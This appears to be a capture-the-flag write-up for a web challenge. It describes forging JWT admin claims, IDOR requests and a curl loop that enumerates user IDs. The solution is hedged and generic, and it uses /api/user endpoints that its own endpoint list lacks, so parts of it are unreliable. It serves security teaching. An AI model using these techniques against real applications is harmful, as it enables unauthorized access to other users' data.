2023 Cyber Apocalypse: Didactic Octo Paddle

#htb #ctf #web #idor #jwt #authentication

Challenge Information

AttributeDetails
Event2023 Cyber Apocalypse
CategoryWeb
ChallengeDidactic Octo Paddle

Summary

This challenge features a shopping application with JWT-based authentication and several vulnerabilities: IDOR (Insecure Direct Object Reference), weak JWT secrets, and improper access controls. The goal is to exploit these to access admin resources.

Analysis

Application endpoints:

  • GET / - Home page with product list
  • GET/POST /register - User registration
  • GET/POST /login - User authentication with JWT
  • GET /cart - View shopping cart
  • POST /add-to-cart/:item - Add item
  • POST /remove-from-cart/:item - Remove item
  • GET /admin - Admin page (requires admin role)

JWT Structure:

Header: {"alg":"HS256","typ":"JWT"}
Payload: {"id":2,"iat":1679241150,"exp":1679244750}
Signature: 9oI6U-J09Nlq2c5G2raESd-8Ska1j7wH9SNjJFE-8I4

Vulnerabilities:

  1. JWT is signed with a potentially weak or default secret
  2. User IDs are predictable and exposed in JWT payload
  3. No proper authorization checks on user-specific endpoints
  4. Admin status may be modifiable in JWT

Solution

Approach 1: JWT Manipulation

  1. Register a user and obtain a JWT token

  2. Decode the JWT payload:

    eyJpZCI6MiwiaWF0IjoxNjc5MjQxMTUwLCJleHAiOjE2NzkyNDQ3NTB9
    Decodes to: {"id":2,"iat":1679241150,"exp":1679244750}

  3. Modify the payload to include "is_admin":1 or change id to 1

  4. Re-sign if the secret is known/weak

Approach 2: IDOR Exploitation

Make requests with different user IDs:

GET /api/user/1  # Admin user
GET /api/user/2  # Current user
GET /api/user/3  # Another user

If authorization isn’t checked properly, you can access other users’ data.

Approach 3: ID Enumeration

If the application stores passwords or sensitive data, enumerate user IDs:

Terminal window
for i in {1..100}; do
    curl -H "Cookie: session=$JWT" http://target/api/user/$i
done

Key Takeaways

  • IDOR occurs when applications don’t verify user authorization
  • JWT secrets must be sufficiently random and secure
  • JWT payload should not contain sensitive information
  • User IDs should not be predictable or sequential
  • Always validate that users can only access their own resources
  • Admin status should never be in user-modifiable tokens
  • Proper authorization checks are essential on every endpoint